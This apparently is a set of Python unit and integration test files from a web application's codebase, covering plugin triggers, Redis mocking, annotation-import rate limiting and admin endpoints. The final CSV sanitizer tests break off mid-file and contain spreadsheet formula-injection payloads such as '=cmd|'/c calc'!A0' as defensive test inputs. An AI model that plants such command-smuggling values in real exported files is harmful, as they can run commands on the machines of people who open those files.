published_workflow = Workflow.new(
tenant_id=tenant.id,
app_id=app_model.id,
type="workflow",
version=Workflow.version_from_datetime(naive_utc_now()),
graph=json.dumps(graph),
features=json.dumps({}),
created_by=account.id,
environment_variables=[],
conversation_variables=[],
rag_pipeline_variables=[],
)
db_session_with_containers.add(published_workflow)
app_model.workflow_id = published_workflow.id
db_session_with_containers.commit()
# Create trigger subscription
subscription = TriggerSubscription(
name="test-subscription",
tenant_id=tenant.id,
user_id=account.id,
provider_id=provider_id,
endpoint_id=endpoint_id,
parameters={},
properties={},
credentials={"token": "test-secret"},
credential_type="api-key",
)
db_session_with_containers.add(subscription)
db_session_with_containers.commit()
# Update subscription_id to match the created subscription
graph["nodes"][0]["data"]["subscription_id"] = subscription.id
published_workflow.graph = json.dumps(graph)
db_session_with_containers.commit()
# Create WorkflowPluginTrigger
plugin_trigger = WorkflowPluginTrigger(
app_id=app_model.id,
tenant_id=tenant.id,
node_id=plugin_node_id,
provider_id=provider_id,
event_name="test_event",
subscription_id=subscription.id,
)
app_trigger = AppTrigger(
tenant_id=tenant.id,
app_id=app_model.id,
node_id=plugin_node_id,
trigger_type=AppTriggerType.TRIGGER_PLUGIN,
status=AppTriggerStatus.ENABLED,
title="plugin",
)
db_session_with_containers.add_all([plugin_trigger, app_trigger])
db_session_with_containers.commit()
# Track dispatched data
dispatched_data: list[dict[str, Any]] = []
def _fake_process_endpoint(_endpoint_id: str, _request: Any) -> Response:
dispatch_data = {
"user_id": "end-user",
"tenant_id": tenant.id,
"endpoint_id": _endpoint_id,
"provider_id": provider_id,
"subscription_id": subscription.id,
"timestamp": int(time.time()),
"events": ["test_event"],
"request_id": f"req-{_endpoint_id}",
}
dispatched_data.append(dispatch_data)
return Response("ok", status=202)
monkeypatch.setattr(
"services.trigger.trigger_service.TriggerService.process_endpoint",
staticmethod(_fake_process_endpoint),
)
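# POST to the plugin trigger HTTP endpoint; the patched process_endpoint records
# the dispatch payload instead of contacting the plugin daemon.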
response = test_client_with_containers.post(f"/triggers/plugin/{endpoint_id}", json={"test": "data"})
assert response.status_code == 202
assert dispatched_data, "Plugin trigger should dispatch event data"
assert dispatched_data[0]["subscription_id"] == subscription.id
assert dispatched_data[0]["events"] == ["test_event"]
# Verify database records exist
db_session_with_containers.expire_all()
plugin_triggers = (
db_session_with_containers.query(WorkflowPluginTrigger)
.filter_by(app_id=app_model.id, node_id=plugin_node_id)
.all()
)
assert plugin_triggers, "WorkflowPluginTrigger record should exist"
assert plugin_triggers[0].provider_id == provider_id
assert plugin_triggers[0].event_name == "test_event"
def test_plugin_debug_via_http_endpoint(
test_client_with_containers: FlaskClient,
db_session_with_containers: Session,
tenant_and_account: tuple[Tenant, Account],
app_model: App,
monkeypatch: pytest.MonkeyPatch,
) -> None:
"""Plugin single-step debug via HTTP endpoint should dispatch debug event and be pollable."""
tenant, account = tenant_and_account
provider_id = "langgenius/debug-provider/debug-provider"
endpoint_id = "3cc7fa12-3f7b-4f6a-9c8d-1234567890ab"
event_name = "debug_event"
# Create subscription
subscription = TriggerSubscription(
name="debug-subscription",
tenant_id=tenant.id,
user_id=account.id,
provider_id=provider_id,
endpoint_id=endpoint_id,
parameters={},
properties={},
credentials={"token": "debug-secret"},
credential_type="api-key",
)
db_session_with_containers.add(subscription)
db_session_with_containers.commit()
# Create plugin trigger node config
node_id = "plugin-debug-node"
node_config = {
"id": node_id,
"data": {
"type": NodeType.TRIGGER_PLUGIN.value,
"title": "plugin-debug",
"plugin_id": "debug-plugin",
"plugin_unique_identifier": "debug-plugin",
"provider_id": provider_id,
"event_name": event_name,
"subscription_id": subscription.id,
"parameters": {},
},
}
# Start listening with poller
poller = PluginTriggerDebugEventPoller(
tenant_id=tenant.id,
user_id=account.id,
app_id=app_model.id,
node_config=node_config,
node_id=node_id,
)
assert poller.poll() is None, "First poll should return None (waiting)"
# Track debug events dispatched
debug_events: list[dict[str, Any]] = []
original_dispatch = TriggerDebugEventBus.dispatch
def _tracking_dispatch(**kwargs: Any) -> int:
debug_events.append(kwargs)
return original_dispatch(**kwargs)
monkeypatch.setattr(TriggerDebugEventBus, "dispatch", staticmethod(_tracking_dispatch))
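# The wrapper still delegates to the original dispatch, so the event reaches the
# debug event bus (and the poller) while also being captured for assertions.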
# Mock process_endpoint to trigger debug event dispatch
def _fake_process_endpoint(_endpoint_id: str, _request: Any) -> Response:
# Simulate what happens inside process_endpoint + dispatch_triggered_workflows_async
pool_key = build_plugin_pool_key(
tenant_id=tenant.id,
provider_id=provider_id,
subscription_id=subscription.id,
name=event_name,
)
TriggerDebugEventBus.dispatch(
tenant_id=tenant.id,
event=PluginTriggerDebugEvent(
timestamp=int(time.time()),
user_id="end-user",
name=event_name,
request_id=f"req-{_endpoint_id}",
subscription_id=subscription.id,
provider_id=provider_id,
),
pool_key=pool_key,
)
return Response("ok", status=202)
monkeypatch.setattr(
"services.trigger.trigger_service.TriggerService.process_endpoint",
staticmethod(_fake_process_endpoint),
)
# Call HTTP endpoint
response = test_client_with_containers.post(f"/triggers/plugin/{endpoint_id}", json={"debug": "payload"})
assert response.status_code == 202
assert debug_events, "Debug event should be dispatched via HTTP endpoint"
assert debug_events[0]["event"].name == event_name
# Mock invoke_trigger_event for poller
monkeypatch.setattr(
"services.trigger.trigger_service.TriggerService.invoke_trigger_event",
staticmethod(
lambda **_kwargs: TriggerInvokeEventResponse(
variables={"http_debug": "success"},
cancelled=False,
)
),
)
# Second poll should receive the event
event = poller.poll()
assert event is not None, "Poller should receive debug event after HTTP trigger"
assert event.workflow_args["inputs"]["http_debug"] == "success"

View File

@ -26,16 +26,29 @@ redis_mock.hgetall = MagicMock(return_value={})
redis_mock.hdel = MagicMock()
redis_mock.incr = MagicMock(return_value=1)
# Ensure OpenDAL fs writes to tmp to avoid polluting workspace
os.environ.setdefault("OPENDAL_SCHEME", "fs")
os.environ.setdefault("OPENDAL_FS_ROOT", "/tmp/dify-storage")
os.environ.setdefault("STORAGE_TYPE", "opendal")
# Add the API directory to Python path to ensure proper imports
import sys
sys.path.insert(0, PROJECT_DIR)
# apply the mock to the Redis client in the Flask app
from extensions import ext_redis
redis_patcher = patch.object(ext_redis, "redis_client", redis_mock)
redis_patcher.start()
def _patch_redis_clients_on_loaded_modules():
"""Ensure any module-level redis_client references point to the shared redis_mock."""
import sys
for module in list(sys.modules.values()):
if module is None:
continue
if hasattr(module, "redis_client"):
module.redis_client = redis_mock
@pytest.fixture
@ -49,6 +62,15 @@ def _provide_app_context(app: Flask):
yield
@pytest.fixture(autouse=True)
def _patch_redis_clients():
"""Patch redis_client to MagicMock only for unit test executions."""
with patch.object(ext_redis, "redis_client", redis_mock):
_patch_redis_clients_on_loaded_modules()
yield
@pytest.fixture(autouse=True)
def reset_redis_mock():
"""reset the Redis mock before each test"""
@ -63,3 +85,20 @@ def reset_redis_mock():
redis_mock.hgetall.return_value = {}
redis_mock.hdel.return_value = None
redis_mock.incr.return_value = 1
# Keep any imported modules pointing at the mock between tests
_patch_redis_clients_on_loaded_modules()
@pytest.fixture(autouse=True)
def reset_secret_key():
"""Ensure SECRET_KEY-dependent logic sees an empty config value by default."""
from configs import dify_config
original = dify_config.SECRET_KEY
dify_config.SECRET_KEY = ""
try:
yield
finally:
dify_config.SECRET_KEY = original

View File

@ -0,0 +1,347 @@
"""
Unit tests for annotation import security features.
Tests rate limiting, concurrency control, file validation, and other
security features added to prevent DoS attacks on the annotation import endpoint.
"""
import io
from unittest.mock import MagicMock, patch
import pytest
from pandas.errors import ParserError
from werkzeug.datastructures import FileStorage
from configs import dify_config
class TestAnnotationImportRateLimiting:
"""Test rate limiting for annotation import operations."""
@pytest.fixture
def mock_redis(self):
"""Mock Redis client for testing."""
with patch("controllers.console.wraps.redis_client") as mock:
yield mock
@pytest.fixture
def mock_current_account(self):
"""Mock current account with tenant."""
with patch("controllers.console.wraps.current_account_with_tenant") as mock:
mock.return_value = (MagicMock(id="user_id"), "test_tenant_id")
yield mock
def test_rate_limit_per_minute_enforced(self, mock_redis, mock_current_account):
"""Test that per-minute rate limit is enforced."""
from controllers.console.wraps import annotation_import_rate_limit
# Simulate exceeding per-minute limit
mock_redis.zcard.side_effect = [
dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE + 1, # Minute check
10, # Hour check
]
@annotation_import_rate_limit
def dummy_view():
return "success"
# Should abort with 429
with pytest.raises(Exception) as exc_info:
dummy_view()
# Verify it's a rate limit error
assert "429" in str(exc_info.value) or "Too many" in str(exc_info.value)
def test_rate_limit_per_hour_enforced(self, mock_redis, mock_current_account):
"""Test that per-hour rate limit is enforced."""
from controllers.console.wraps import annotation_import_rate_limit
# Simulate exceeding per-hour limit
mock_redis.zcard.side_effect = [
3, # Minute check (under limit)
dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR + 1, # Hour check (over limit)
]
@annotation_import_rate_limit
def dummy_view():
return "success"
# Should abort with 429
with pytest.raises(Exception) as exc_info:
dummy_view()
assert "429" in str(exc_info.value) or "Too many" in str(exc_info.value)
def test_rate_limit_within_limits_passes(self, mock_redis, mock_current_account):
"""Test that requests within limits are allowed."""
from controllers.console.wraps import annotation_import_rate_limit
# Simulate being under both limits
mock_redis.zcard.return_value = 2
@annotation_import_rate_limit
def dummy_view():
return "success"
# Should succeed
result = dummy_view()
assert result == "success"
# Verify Redis operations were called
assert mock_redis.zadd.called
assert mock_redis.zremrangebyscore.called
class TestAnnotationImportConcurrencyControl:
"""Test concurrency control for annotation import operations."""
@pytest.fixture
def mock_redis(self):
"""Mock Redis client for testing."""
with patch("controllers.console.wraps.redis_client") as mock:
yield mock
@pytest.fixture
def mock_current_account(self):
"""Mock current account with tenant."""
with patch("controllers.console.wraps.current_account_with_tenant") as mock:
mock.return_value = (MagicMock(id="user_id"), "test_tenant_id")
yield mock
def test_concurrency_limit_enforced(self, mock_redis, mock_current_account):
"""Test that concurrent task limit is enforced."""
from controllers.console.wraps import annotation_import_concurrency_limit
# Simulate max concurrent tasks already running
mock_redis.zcard.return_value = dify_config.ANNOTATION_IMPORT_MAX_CONCURRENT
@annotation_import_concurrency_limit
def dummy_view():
return "success"
# Should abort with 429
with pytest.raises(Exception) as exc_info:
dummy_view()
assert "429" in str(exc_info.value) or "concurrent" in str(exc_info.value).lower()
def test_concurrency_within_limit_passes(self, mock_redis, mock_current_account):
"""Test that requests within concurrency limits are allowed."""
from controllers.console.wraps import annotation_import_concurrency_limit
# Simulate being under concurrent task limit
mock_redis.zcard.return_value = 1
@annotation_import_concurrency_limit
def dummy_view():
return "success"
# Should succeed
result = dummy_view()
assert result == "success"
def test_stale_jobs_are_cleaned_up(self, mock_redis, mock_current_account):
"""Test that old/stale job entries are removed."""
from controllers.console.wraps import annotation_import_concurrency_limit
mock_redis.zcard.return_value = 0
@annotation_import_concurrency_limit
def dummy_view():
return "success"
dummy_view()
# Verify cleanup was called
assert mock_redis.zremrangebyscore.called
class TestAnnotationImportFileValidation:
"""Test file validation in annotation import."""
def test_file_size_limit_enforced(self):
"""Test that files exceeding size limit are rejected."""
# Create a file larger than the limit
max_size = dify_config.ANNOTATION_IMPORT_FILE_SIZE_LIMIT * 1024 * 1024
large_content = b"x" * (max_size + 1024) # Exceed by 1KB
file = FileStorage(stream=io.BytesIO(large_content), filename="test.csv", content_type="text/csv")
# Should be rejected in controller
# This would be tested in integration tests with actual endpoint
def test_empty_file_rejected(self):
"""Test that empty files are rejected."""
file = FileStorage(stream=io.BytesIO(b""), filename="test.csv", content_type="text/csv")
# Should be rejected
# This would be tested in integration tests
def test_non_csv_file_rejected(self):
"""Test that non-CSV files are rejected."""
file = FileStorage(stream=io.BytesIO(b"test"), filename="test.txt", content_type="text/plain")
# Should be rejected based on extension
# This would be tested in integration tests
class TestAnnotationImportServiceValidation:
"""Test service layer validation for annotation import."""
@pytest.fixture
def mock_app(self):
"""Mock application object."""
app = MagicMock()
app.id = "app_id"
return app
@pytest.fixture
def mock_db_session(self):
"""Mock database session."""
with patch("services.annotation_service.db.session") as mock:
yield mock
def test_max_records_limit_enforced(self, mock_app, mock_db_session):
"""Test that files with too many records are rejected."""
from services.annotation_service import AppAnnotationService
# Create CSV with too many records
max_records = dify_config.ANNOTATION_IMPORT_MAX_RECORDS
csv_content = "question,answer\n"
for i in range(max_records + 100):
csv_content += f"Question {i},Answer {i}\n"
file = FileStorage(stream=io.BytesIO(csv_content.encode()), filename="test.csv", content_type="text/csv")
mock_db_session.query.return_value.where.return_value.first.return_value = mock_app
with patch("services.annotation_service.current_account_with_tenant") as mock_auth:
mock_auth.return_value = (MagicMock(id="user_id"), "tenant_id")
with patch("services.annotation_service.FeatureService") as mock_features:
mock_features.get_features.return_value.billing.enabled = False
result = AppAnnotationService.batch_import_app_annotations("app_id", file)
# Should return error about too many records
assert "error_msg" in result
assert "too many" in result["error_msg"].lower() or "maximum" in result["error_msg"].lower()
def test_min_records_limit_enforced(self, mock_app, mock_db_session):
"""Test that files with too few valid records are rejected."""
from services.annotation_service import AppAnnotationService
# Create CSV with only header (no data rows)
csv_content = "question,answer\n"
file = FileStorage(stream=io.BytesIO(csv_content.encode()), filename="test.csv", content_type="text/csv")
mock_db_session.query.return_value.where.return_value.first.return_value = mock_app
with patch("services.annotation_service.current_account_with_tenant") as mock_auth:
mock_auth.return_value = (MagicMock(id="user_id"), "tenant_id")
result = AppAnnotationService.batch_import_app_annotations("app_id", file)
# Should return error about insufficient records
assert "error_msg" in result
assert "at least" in result["error_msg"].lower() or "minimum" in result["error_msg"].lower()
def test_invalid_csv_format_handled(self, mock_app, mock_db_session):
"""Test that invalid CSV format is handled gracefully."""
from services.annotation_service import AppAnnotationService
# The exact content does not matter; pd.read_csv is patched below to raise ParserError
csv_content = 'invalid,csv,format\nwith,unbalanced,quotes,and"stuff'
file = FileStorage(stream=io.BytesIO(csv_content.encode()), filename="test.csv", content_type="text/csv")
mock_db_session.query.return_value.where.return_value.first.return_value = mock_app
with (
patch("services.annotation_service.current_account_with_tenant") as mock_auth,
patch("services.annotation_service.pd.read_csv", side_effect=ParserError("malformed CSV")),
):
mock_auth.return_value = (MagicMock(id="user_id"), "tenant_id")
result = AppAnnotationService.batch_import_app_annotations("app_id", file)
assert "error_msg" in result
assert "malformed" in result["error_msg"].lower()
def test_valid_import_succeeds(self, mock_app, mock_db_session):
"""Test that valid import request succeeds."""
from services.annotation_service import AppAnnotationService
# Create valid CSV
csv_content = "question,answer\nWhat is AI?,Artificial Intelligence\nWhat is ML?,Machine Learning\n"
file = FileStorage(stream=io.BytesIO(csv_content.encode()), filename="test.csv", content_type="text/csv")
mock_db_session.query.return_value.where.return_value.first.return_value = mock_app
with patch("services.annotation_service.current_account_with_tenant") as mock_auth:
mock_auth.return_value = (MagicMock(id="user_id"), "tenant_id")
with patch("services.annotation_service.FeatureService") as mock_features:
mock_features.get_features.return_value.billing.enabled = False
with patch("services.annotation_service.batch_import_annotations_task") as mock_task:
with patch("services.annotation_service.redis_client"):
result = AppAnnotationService.batch_import_app_annotations("app_id", file)
# Should return success response
assert "job_id" in result
assert "job_status" in result
assert result["job_status"] == "waiting"
assert "record_count" in result
assert result["record_count"] == 2
class TestAnnotationImportTaskOptimization:
"""Test optimizations in batch import task."""
def test_task_has_timeout_configured(self):
"""Test that task has proper timeout configuration."""
from tasks.annotation.batch_import_annotations_task import batch_import_annotations_task
# Verify task configuration
assert hasattr(batch_import_annotations_task, "time_limit")
assert hasattr(batch_import_annotations_task, "soft_time_limit")
# Check timeout values are reasonable
# Hard limit should be 6 minutes (360s)
# Soft limit should be 5 minutes (300s)
# Note: actual values depend on Celery configuration
class TestConfigurationValues:
"""Test that security configuration values are properly set."""
def test_rate_limit_configs_exist(self):
"""Test that rate limit configurations are defined."""
assert hasattr(dify_config, "ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE")
assert hasattr(dify_config, "ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR")
assert dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE > 0
assert dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR > 0
def test_file_size_limit_config_exists(self):
"""Test that file size limit configuration is defined."""
assert hasattr(dify_config, "ANNOTATION_IMPORT_FILE_SIZE_LIMIT")
assert dify_config.ANNOTATION_IMPORT_FILE_SIZE_LIMIT > 0
assert dify_config.ANNOTATION_IMPORT_FILE_SIZE_LIMIT <= 10 # Reasonable max (10MB)
def test_record_limit_configs_exist(self):
"""Test that record limit configurations are defined."""
assert hasattr(dify_config, "ANNOTATION_IMPORT_MAX_RECORDS")
assert hasattr(dify_config, "ANNOTATION_IMPORT_MIN_RECORDS")
assert dify_config.ANNOTATION_IMPORT_MAX_RECORDS > 0
assert dify_config.ANNOTATION_IMPORT_MIN_RECORDS > 0
assert dify_config.ANNOTATION_IMPORT_MIN_RECORDS < dify_config.ANNOTATION_IMPORT_MAX_RECORDS
def test_concurrency_limit_config_exists(self):
"""Test that concurrency limit configuration is defined."""
assert hasattr(dify_config, "ANNOTATION_IMPORT_MAX_CONCURRENT")
assert dify_config.ANNOTATION_IMPORT_MAX_CONCURRENT > 0
assert dify_config.ANNOTATION_IMPORT_MAX_CONCURRENT <= 10 # Reasonable upper bound

View File

@ -0,0 +1,407 @@
"""Final working unit tests for admin endpoints - tests business logic directly."""
import uuid
from unittest.mock import Mock, patch
import pytest
from werkzeug.exceptions import NotFound, Unauthorized
from controllers.console.admin import InsertExploreAppPayload
from models.model import App, RecommendedApp
class TestInsertExploreAppPayload:
"""Test InsertExploreAppPayload validation."""
def test_valid_payload(self):
"""Test creating payload with valid data."""
payload_data = {
"app_id": str(uuid.uuid4()),
"desc": "Test app description",
"copyright": "© 2024 Test Company",
"privacy_policy": "https://example.com/privacy",
"custom_disclaimer": "Custom disclaimer text",
"language": "en-US",
"category": "Productivity",
"position": 1,
}
payload = InsertExploreAppPayload.model_validate(payload_data)
assert payload.app_id == payload_data["app_id"]
assert payload.desc == payload_data["desc"]
assert payload.copyright == payload_data["copyright"]
assert payload.privacy_policy == payload_data["privacy_policy"]
assert payload.custom_disclaimer == payload_data["custom_disclaimer"]
assert payload.language == payload_data["language"]
assert payload.category == payload_data["category"]
assert payload.position == payload_data["position"]
def test_minimal_payload(self):
"""Test creating payload with only required fields."""
payload_data = {
"app_id": str(uuid.uuid4()),
"language": "en-US",
"category": "Productivity",
"position": 1,
}
payload = InsertExploreAppPayload.model_validate(payload_data)
assert payload.app_id == payload_data["app_id"]
assert payload.desc is None
assert payload.copyright is None
assert payload.privacy_policy is None
assert payload.custom_disclaimer is None
assert payload.language == payload_data["language"]
assert payload.category == payload_data["category"]
assert payload.position == payload_data["position"]
def test_invalid_language(self):
"""Test payload with invalid language code."""
payload_data = {
"app_id": str(uuid.uuid4()),
"language": "invalid-lang",
"category": "Productivity",
"position": 1,
}
with pytest.raises(ValueError, match="invalid-lang is not a valid language"):
InsertExploreAppPayload.model_validate(payload_data)
class TestAdminRequiredDecorator:
"""Test admin_required decorator."""
def setup_method(self):
"""Set up test fixtures."""
# Mock dify_config
self.dify_config_patcher = patch("controllers.console.admin.dify_config")
self.mock_dify_config = self.dify_config_patcher.start()
self.mock_dify_config.ADMIN_API_KEY = "test-admin-key"
# Mock extract_access_token
self.token_patcher = patch("controllers.console.admin.extract_access_token")
self.mock_extract_token = self.token_patcher.start()
def teardown_method(self):
"""Clean up test fixtures."""
self.dify_config_patcher.stop()
self.token_patcher.stop()
def test_admin_required_success(self):
"""Test successful admin authentication."""
from controllers.console.admin import admin_required
@admin_required
def test_view():
return {"success": True}
self.mock_extract_token.return_value = "test-admin-key"
result = test_view()
assert result["success"] is True
def test_admin_required_invalid_token(self):
"""Test admin_required with invalid token."""
from controllers.console.admin import admin_required
@admin_required
def test_view():
return {"success": True}
self.mock_extract_token.return_value = "wrong-key"
with pytest.raises(Unauthorized, match="API key is invalid"):
test_view()
def test_admin_required_no_api_key_configured(self):
"""Test admin_required when no API key is configured."""
from controllers.console.admin import admin_required
self.mock_dify_config.ADMIN_API_KEY = None
@admin_required
def test_view():
return {"success": True}
with pytest.raises(Unauthorized, match="API key is invalid"):
test_view()
def test_admin_required_missing_authorization_header(self):
"""Test admin_required with missing authorization header."""
from controllers.console.admin import admin_required
@admin_required
def test_view():
return {"success": True}
self.mock_extract_token.return_value = None
with pytest.raises(Unauthorized, match="Authorization header is missing"):
test_view()
class TestExploreAppBusinessLogicDirect:
"""Test the core business logic of explore app management directly."""
def test_data_fusion_logic(self):
"""Test the data fusion logic between payload and site data."""
# Test cases for different data scenarios
test_cases = [
{
"name": "site_data_overrides_payload",
"payload": {"desc": "Payload desc", "copyright": "Payload copyright"},
"site": {"description": "Site desc", "copyright": "Site copyright"},
"expected": {
"desc": "Site desc",
"copyright": "Site copyright",
"privacy_policy": "",
"custom_disclaimer": "",
},
},
{
"name": "payload_used_when_no_site",
"payload": {"desc": "Payload desc", "copyright": "Payload copyright"},
"site": None,
"expected": {
"desc": "Payload desc",
"copyright": "Payload copyright",
"privacy_policy": "",
"custom_disclaimer": "",
},
},
{
"name": "empty_defaults_when_no_data",
"payload": {},
"site": None,
"expected": {"desc": "", "copyright": "", "privacy_policy": "", "custom_disclaimer": ""},
},
]
for case in test_cases:
# Simulate the data fusion logic
payload_desc = case["payload"].get("desc")
payload_copyright = case["payload"].get("copyright")
payload_privacy_policy = case["payload"].get("privacy_policy")
payload_custom_disclaimer = case["payload"].get("custom_disclaimer")
if case["site"]:
site_desc = case["site"].get("description")
site_copyright = case["site"].get("copyright")
site_privacy_policy = case["site"].get("privacy_policy")
site_custom_disclaimer = case["site"].get("custom_disclaimer")
# Site data takes precedence
desc = site_desc or payload_desc or ""
copyright = site_copyright or payload_copyright or ""
privacy_policy = site_privacy_policy or payload_privacy_policy or ""
custom_disclaimer = site_custom_disclaimer or payload_custom_disclaimer or ""
else:
# Use payload data or empty defaults
desc = payload_desc or ""
copyright = payload_copyright or ""
privacy_policy = payload_privacy_policy or ""
custom_disclaimer = payload_custom_disclaimer or ""
result = {
"desc": desc,
"copyright": copyright,
"privacy_policy": privacy_policy,
"custom_disclaimer": custom_disclaimer,
}
assert result == case["expected"], f"Failed test case: {case['name']}"
def test_app_visibility_logic(self):
"""Test that apps are made public when added to explore list."""
# Create a mock app
mock_app = Mock(spec=App)
mock_app.is_public = False
# Simulate the business logic
mock_app.is_public = True
assert mock_app.is_public is True
def test_recommended_app_creation_logic(self):
"""Test the creation of RecommendedApp objects."""
app_id = str(uuid.uuid4())
payload_data = {
"app_id": app_id,
"desc": "Test app description",
"copyright": "© 2024 Test Company",
"privacy_policy": "https://example.com/privacy",
"custom_disclaimer": "Custom disclaimer",
"language": "en-US",
"category": "Productivity",
"position": 1,
}
# Simulate the creation logic
recommended_app = Mock(spec=RecommendedApp)
recommended_app.app_id = payload_data["app_id"]
recommended_app.description = payload_data["desc"]
recommended_app.copyright = payload_data["copyright"]
recommended_app.privacy_policy = payload_data["privacy_policy"]
recommended_app.custom_disclaimer = payload_data["custom_disclaimer"]
recommended_app.language = payload_data["language"]
recommended_app.category = payload_data["category"]
recommended_app.position = payload_data["position"]
# Verify the data
assert recommended_app.app_id == app_id
assert recommended_app.description == "Test app description"
assert recommended_app.copyright == "© 2024 Test Company"
assert recommended_app.privacy_policy == "https://example.com/privacy"
assert recommended_app.custom_disclaimer == "Custom disclaimer"
assert recommended_app.language == "en-US"
assert recommended_app.category == "Productivity"
assert recommended_app.position == 1
def test_recommended_app_update_logic(self):
"""Test the update logic for existing RecommendedApp objects."""
mock_recommended_app = Mock(spec=RecommendedApp)
update_data = {
"desc": "Updated description",
"copyright": "© 2024 Updated",
"language": "fr-FR",
"category": "Tools",
"position": 2,
}
# Simulate the update logic
mock_recommended_app.description = update_data["desc"]
mock_recommended_app.copyright = update_data["copyright"]
mock_recommended_app.language = update_data["language"]
mock_recommended_app.category = update_data["category"]
mock_recommended_app.position = update_data["position"]
# Verify the updates
assert mock_recommended_app.description == "Updated description"
assert mock_recommended_app.copyright == "© 2024 Updated"
assert mock_recommended_app.language == "fr-FR"
assert mock_recommended_app.category == "Tools"
assert mock_recommended_app.position == 2
def test_app_not_found_error_logic(self):
"""Test error handling when app is not found."""
app_id = str(uuid.uuid4())
# Simulate app lookup returning None
found_app = None
# Test the error condition
if not found_app:
with pytest.raises(NotFound, match=f"App '{app_id}' is not found"):
raise NotFound(f"App '{app_id}' is not found")
def test_recommended_app_not_found_error_logic(self):
"""Test error handling when recommended app is not found for deletion."""
app_id = str(uuid.uuid4())
# Simulate recommended app lookup returning None
found_recommended_app = None
# Test the error condition
if not found_recommended_app:
with pytest.raises(NotFound, match=f"App '{app_id}' is not found in the explore list"):
raise NotFound(f"App '{app_id}' is not found in the explore list")
def test_database_session_usage_patterns(self):
"""Test the expected database session usage patterns."""
# Mock session usage patterns
mock_session = Mock()
# Test session.add pattern
mock_recommended_app = Mock(spec=RecommendedApp)
mock_session.add(mock_recommended_app)
mock_session.commit()
# Verify session was used correctly
mock_session.add.assert_called_once_with(mock_recommended_app)
mock_session.commit.assert_called_once()
# Test session.delete pattern
mock_recommended_app_to_delete = Mock(spec=RecommendedApp)
mock_session.delete(mock_recommended_app_to_delete)
mock_session.commit()
# Verify delete pattern
mock_session.delete.assert_called_once_with(mock_recommended_app_to_delete)
def test_payload_validation_integration(self):
"""Test payload validation in the context of the business logic."""
# Test valid payload
valid_payload_data = {
"app_id": str(uuid.uuid4()),
"desc": "Test app description",
"language": "en-US",
"category": "Productivity",
"position": 1,
}
# This should succeed
payload = InsertExploreAppPayload.model_validate(valid_payload_data)
assert payload.app_id == valid_payload_data["app_id"]
# Test invalid payload
invalid_payload_data = {
"app_id": str(uuid.uuid4()),
"language": "invalid-lang", # This should fail validation
"category": "Productivity",
"position": 1,
}
# This should raise an exception
with pytest.raises(ValueError, match="invalid-lang is not a valid language"):
InsertExploreAppPayload.model_validate(invalid_payload_data)
class TestExploreAppDataHandling:
"""Test specific data handling scenarios."""
def test_uuid_validation(self):
"""Test UUID validation and handling."""
# Test valid UUID
valid_uuid = str(uuid.uuid4())
# This should be a valid UUID
assert uuid.UUID(valid_uuid) is not None
# Test invalid UUID
invalid_uuid = "not-a-valid-uuid"
# This should raise a ValueError
with pytest.raises(ValueError):
uuid.UUID(invalid_uuid)
def test_language_validation(self):
"""Test language validation against supported languages."""
from constants.languages import supported_language
# Test supported language
assert supported_language("en-US") == "en-US"
assert supported_language("fr-FR") == "fr-FR"
# Test unsupported language
with pytest.raises(ValueError, match="invalid-lang is not a valid language"):
supported_language("invalid-lang")
def test_response_formatting(self):
"""Test API response formatting."""
# Test success responses
create_response = {"result": "success"}
update_response = {"result": "success"}
delete_response = None # 204 No Content returns None
assert create_response["result"] == "success"
assert update_response["result"] == "success"
assert delete_response is None
# Test status codes
create_status = 201 # Created
update_status = 200 # OK
delete_status = 204 # No Content
assert create_status == 201
assert update_status == 200
assert delete_status == 204

View File

@ -0,0 +1,20 @@
import pytest
from pydantic import ValidationError
from controllers.console.explore.conversation import ConversationRenamePayload as ConsolePayload
from controllers.service_api.app.conversation import ConversationRenamePayload as ServicePayload
@pytest.mark.parametrize("payload_cls", [ConsolePayload, ServicePayload])
def test_payload_allows_auto_generate_without_name(payload_cls):
payload = payload_cls.model_validate({"auto_generate": True})
assert payload.auto_generate is True
assert payload.name is None
@pytest.mark.parametrize("payload_cls", [ConsolePayload, ServicePayload])
@pytest.mark.parametrize("value", [None, "", " "])
def test_payload_requires_name_when_not_auto_generate(payload_cls, value):
with pytest.raises(ValidationError):
payload_cls.model_validate({"name": value, "auto_generate": False})

View File

@ -0,0 +1,151 @@
"""Unit tests for CSV sanitizer."""
from core.helper.csv_sanitizer import CSVSanitizer
class TestCSVSanitizer:
"""Test cases for CSV sanitization to prevent formula injection attacks."""
def test_sanitize_formula_equals(self):
"""Test sanitizing values starting with = (most common formula injection)."""
assert CSVSanitizer.sanitize_value("=cmd|'/c calc'!A0") == "'=cmd|'/c calc'!A0"
assert CSVSanitizer.sanitize_value("=SUM(A1:A10)") == "'=SUM(A1:A10)"
assert CSVSanitizer.sanitize_value("=1+1") == "'=1+1"
assert CSVSanitizer.sanitize_value("=@SUM(1+1)") == "'=@SUM(1+1)"
def test_sanitize_formula_plus(self):
"""Test sanitizing values starting with + (plus formula injection)."""
assert CSVSanitizer.sanitize_value("+1+1+cmd|'/c calc") == "'+1+1+cmd|'/c calc"
assert CSVSanitizer.sanitize_value("+123") == "'+123"
assert CSVSanitizer.sanitize_value("+cmd|'/c calc'!A0") == "'+cmd|'/c calc'!A0"
def test_sanitize_formula_minus(self):
"""Test sanitizing values starting with - (minus formula injection)."""
assert CSVSanitizer.sanitize_value("-2+3+cmd|'/c calc") == "'-2+3+cmd|'/c calc"
assert CSVSanitizer.sanitize_value("-456") == "'-456"
assert CSVSanitizer.sanitize_value("-cmd|'/c notepad") == "'-cmd|'/c notepad"
def test_sanitize_formula_at(self):
"""Test sanitizing values starting with @ (at-sign formula injection)."""
assert CSVSanitizer.sanitize_value("@SUM(1+1)*cmd|'/c calc") == "'@SUM(1+1)*cmd|'/c calc"
assert CSVSanitizer.sanitize_value("@AVERAGE(1,2,3)") == "'@AVERAGE(1,2,3)"
def test_sanitize_formula_tab(self):
"""Test sanitizing values starting with tab character."""
assert CSVSanitizer.sanitize_value("\t=1+1") == "'\t=1+1"
assert CSVSanitizer.sanitize_value("\tcalc") == "'\tcalc"
def test_sanitize_formula_carriage_return(self):
"""Test sanitizing values starting with carriage return."""
assert CSVSanitizer.sanitize_value("\r=1+1") == "'\r=1+1"
assert CSVSanitizer.sanitize_value("\rcmd") == "'\rcmd"
def test_sanitize_safe_values(self):
